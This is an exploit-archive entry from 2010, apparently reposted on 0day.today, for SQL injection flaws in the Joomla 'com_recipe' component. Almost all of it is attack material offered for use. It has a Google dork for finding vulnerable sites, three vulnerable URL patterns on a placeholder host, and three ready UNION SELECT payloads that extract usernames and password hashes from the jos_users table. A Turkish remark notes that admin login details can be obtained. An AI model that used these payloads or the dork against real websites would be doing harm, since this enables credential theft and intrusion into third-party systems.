Joomla Component com_recipe SQL Injection Vulnerabilities

2010-02-20T00:00:00
ID 1337DAY-ID-10997
Type zdt
Reporter Fl0riX
Modified 2010-02-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
Joomla Component com_recipe SQL Injection Vulnerabilities
=========================================================

# Name     : com_recipe

#

# Google Dork: allinurl:"com_recipe"

#                                                        

# Bug Type   : SQL Injection

#                                                        

# Infection    : Admin login bilgileri alinabilir.       

#                                                        

# Demo Vulns :

#

# 
site.com/index.php?option=com_recipe&view=recipe&layout=defaults&rec=73[EXPLOIT1]
# 
site.com/index.php?option=com_recipe&task=type&Itemid=16&type=4&category=2[EXPLOIT2]
# 
site.com/index.php?option=com_recipe&task=view&Itemid=16&id=4[EXPLOIT3]

#

#
EXPLOIT1 : 
+and+1=0+union+select+concat(username,0x3a,password)+from+jos_users--
#
EXPLOIT2 :+and+1=0+union+select+1,concat(username,0x3a,password),3,4+from+jos_users--
#
EXPLOIT3 :+and+1=0+union+select+user(),concat(username,0x3a,password),user(),user()+from+jos_users--

#############################################################################



#  0day.today [2018-03-09]  #